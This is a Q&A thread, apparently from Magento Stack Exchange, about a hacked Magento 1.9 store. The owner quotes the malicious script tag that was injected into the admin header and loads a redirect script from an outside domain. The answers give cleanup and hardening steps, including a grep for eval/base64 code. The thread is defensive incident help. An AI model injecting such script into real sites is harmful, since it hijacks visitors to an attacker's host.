# Magento website redirect to "https://ribinski.us/redirect_base/redirect.js"

Tags: magento-1.9, security

I am using Magento 1.9.2.1. It is redirecting me to another website `https://ribinski.us/redirect_base/redirect.js`. When I checked the code then someone added the following code in the Admin header section.

```
<script src="https://ribinski.us/redirect_base/redirect.js" id="1371499155545"></script><script type='text/javascript'>
(function (d, t) {
  var bh = d.createElement(t), s = d.getElementsByTagName(t)[0];
  bh.type = 'text/javascript';
  bh.src = '//www.bugherd.com/sidebarv2.js?apikey=onjdmwrwrjc7swchqcrxra';
  s.parentNode.insertBefore(bh, s);
  })(document, 'script');
</script>
```

I remove the code but I am not sure how hacker inserted it in the database. I have installed all the security patches recommended in mage report. Please help me to identify the loop hole of magento.

Thanks!

Comment: have you installed any new extension on your site ?

Comment: Again check your website with https://www.magereport.com/ , check with all warning display there

Comment: here the discussion going on https://magento.stackexchange.com/questions/182920/website-start-redirecting-to-another-url

Comment: first of all check your server have right permission and change your username and password. protect /admin url and downloader from urer

Comment: If you found a solution here, please consider accepting an answer :)

Answer (score 1):

There is another question where the same link is injected.

See: [Website start redirecting to another url](https://magento.stackexchange.com/questions/182920/website-start-redirecting-to-another-url)

Possible solution:

- first i'd change DB password *(and maybe all other passwords giving access to backend/server/...)*
- remove entry from **Admin - Configuration - General - Design -HTML Head**
- update to latest version or apply all missing security patches *(if not already done)*

Answer (score 0):

1) Compare with a new Magento installation to see if core files have been modified.

- Find files modified in the last 10 days :

  ```
  find /docroot -type f -mtime -10
  ```
- Find files that contain suspicious php code :

  ```
  grep -r --include='*.php' 'eval(' /docroot | grep base64
  ```

2) Compare with a clean Magento installation

3) Verify that you have installed all the relevant **Magento patches** and the latest versions of 3rd party extensions!

Answer (score 0):

I had the same problem two days ago on my 4 sites. They are all:

- Magento 1.9.2.3.
- All patches have been installed.
- My admins are: ...//my-site.com/admin

And my solution is:

1. Change admin path - from "admin" (default) to custom path.
2. Change admin password.
3. Change in my DB - name, user and user-pass.
4. Clear all cashes Magento.
5. I add in my .htaccess-file this rows:

### always send 404 on missing files in these folders

```
RewriteCond %{REQUEST_URI} !^/(media|skin|js)/

RewriteCond %{REQUEST_URI} ^/index.php/MY-CUSTOM-ADMIN-PATH.*$

RewriteCond %{REMOTE_ADDR} !^100\.100\.100\.100
(here I add my IP)

RewriteCond %{HTTP_COOKIE} !^.*some-cookie-name=true
```

Here I get browser extension and add custom cookie In my browser by associating it with my site (like "EditThisCookie" - for Google Chrome - EditThisCookie is a cookie manager. You can add, delete, edit, search, protect and block cookies!)

```
RewriteRule ^(.*)$ / [L,R=302]
```

This rows need add before this:

### never rewrite for existing files, directories and links

```
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l
```

Result is:

1. The system check:

Is this my custom admin url? If not - redirect to homepage.

If yes - check is this my IP? If not - redirect to homepage.

If yes - check my browser - Is there any cookie added ("some-cookie-name=true")?

If yes - open my admin page. If not - redirect to homepage.

2. There were no more redirects!
3. This hack give me many visits in my site because every attempt to reach admin is redirected to the site homepage.

I hope this helps.